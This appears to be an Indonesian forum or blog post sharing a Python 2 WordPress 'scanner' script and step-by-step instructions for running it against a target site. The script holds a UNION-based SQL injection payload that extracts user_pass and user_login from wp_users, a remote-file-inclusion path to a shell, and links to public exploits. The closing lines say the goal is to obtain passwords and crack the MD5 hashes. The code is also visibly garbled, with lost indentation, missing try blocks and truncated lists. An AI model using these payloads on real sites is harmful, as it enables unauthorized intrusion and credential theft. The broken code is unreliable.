udeh itu aja kok ....peace...................:P
nah sekarang liat code di bawah ini
#WordPress SQL/RFI/CGI scanner. SQL will check
#for md5's in the source and RFI/CGI will use
#http responses.
import sys, urllib2, re, time, httplib
#Bad HTTP Responses
BAD_RESP = [400,401,404]
def main(path):
print "[+] Testing:",host.split("/",1)[1]+path
h = httplib.HTTP(host.split("/",1)[0])
h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
h.putheader("Host", host.split("/",1)[0])
resp, reason, headers = h.getreply()
return resp, reason, headers.get("Server")
except(), msg:
print "Error Occurred:",msg
def timer():
now = time.localtime(time.time())
return time.asctime(now)
print "\n\t d3hydr8[at]gmail[dot]com WPScan v1.0"
print "\t------------------------------------------"
sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
if len(sys.argv) != 2:
print "\nUsage: ./wpscan.py
print "Ex: ./wpscan.py www.site.com/wp-content/\n"
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
host = host+"/"
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] RFI Loaded:",len(rfis)
print "[+] CGI Loaded:",len(cgis)
server = main("/")[2]
print "[+] Server:",server
print "\n[+] Started:",timer()
print "\n[+] Scanning: SQL\n"
for sql in sqls:
time.sleep(2) #Change this if needed
print "[+] Trying:",sql.replace("\n","")
source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
print "[!]",host+sql.replace("\n","")
for md5 in md5s:
print "\n\t[+]MD5:",md5
print "\n[+] Scanning: RFI\n"
for rfi, shell in rfis.items():
resp,reason,server = main(rfi)
if resp not in BAD_RESP:
print "\t[+] Got:",resp, reason
print "\t[+] Try:",host+shell
print "\t[-] Got:",resp, reason
print "\n[+] Scanning: CGI\n"
for cgi, expl in cgis.items():
resp,reason,server = main(cgi)
if resp not in BAD_RESP:
print "\t[+] Got:",resp, reason
print "\t[+] Check:",expl
print "\t[-] Got:",resp, reason
print "\n[-] Done\n"
copas aja dah ,,,trus save dengan nama wpscan.py... klo udah ...ikutin langkah-langkah berikut
- buka command prompt (start - run - cmd)
- tuliskan perintah cd desktop
- tuliskan perintah wpscan.py (untuk introduction)
- tuliskan perintan wpscan.py url-target.wordpress.com
nanti lo bakalan ketemu dengan hasil passoword ,,,tinggal di enskripsi md5
